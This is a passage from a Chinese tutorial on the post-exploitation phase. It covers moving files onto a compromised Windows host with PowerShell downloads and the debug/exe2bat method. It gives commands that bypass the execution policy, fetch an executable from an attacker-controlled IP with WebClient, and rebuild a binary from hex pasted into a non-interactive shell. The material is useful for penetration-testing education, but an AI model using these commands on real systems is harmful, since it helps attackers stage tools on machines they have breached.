关于后漏洞利用阶段的介绍( 四 )

在已经开启http服务的情况下 , 在Windows环境通过命令执行上面这个脚本:

关于后漏洞利用阶段的介绍

文章插图
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
如果执行的时候遇到“远程服务器返回错误: (403) 已禁止 。” , 那应该是源文件的权限有问题 , 用chmod命令去修改一下权限就可以了 。
执行命令中的一些参数-ExecutionPolicy主要是为了允许本地执行powershell脚本 , 感兴趣的可以通过-Help看一下帮助说明 。
上面的脚本其实可以省略 , 直接在dos界面执行一个长命令:
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.102/whoami.exe', 'D:w.exe')也能达到同样的效果:
关于后漏洞利用阶段的介绍

文章插图
下载软件
如果本地的执行策略比较严格 , 还是需要加上前面的那些参数 。
还有powershell能使用的模块很多 , 不一定要用System.Net.WebClient , 还有Invoke-WebRequest、Invoke-RestMethod、Start-BitTransfer都能达到同样的效果 。具体使用哪一个模块 , 主要看你控制的机器具体版本 , 一般都是有什么用什么 。
往Windows传文件:debugDebug工具是windows用来做汇编等的一个工具 。在新一点的Windows10已经没有了 , 早一些的WindowsXp还是有的 。如果你的目标机器是Windows10的系统 , 且现有条件让你必须使用debug , 那你必须给目标机器安装一个debug工具 , 这就变成先有鸡还是先有蛋的问题了 。不是很推荐debug这种方式传输软件 。
先将要传递的软件进行压缩:
关于后漏洞利用阶段的介绍

文章插图
upx -9 whoami.exe
压缩不是必须的 , 只是当文件太大的时候 , debug就无法转换成功 , debug最大只能是64Kb 。
用工具exe2bat.exe转换一下:
关于后漏洞利用阶段的介绍

文章插图
wine /usr/share/windows-binaries/exe2bat.exe whoami.exe whoami.txt
由于这个工具是Windows环境的 , 所以要通过wine工具来运行 。可以看到输出的文档:
关于后漏洞利用阶段的介绍

文章插图
cat whoami.txt
在已经获取的非交互模式shell中 , 直接执行输出txt文档里面的内容 , 除最后两行外 。
执行完之后 , 在被控制的目标机器上就会有一个123.hex文件:
关于后漏洞利用阶段的介绍

文章插图
目标机器生成123.hex
然后执行倒数第二行命令debug<123.hex , Windows就会进行一个汇编的工程 , 最终输出一个1.DLL文件 , 这个文件其实就是原来的exe文件 。最后就是执行最后一行命令copy 1.dll whoami.exe , 将文件还原成exe的可执行文件 。




推荐阅读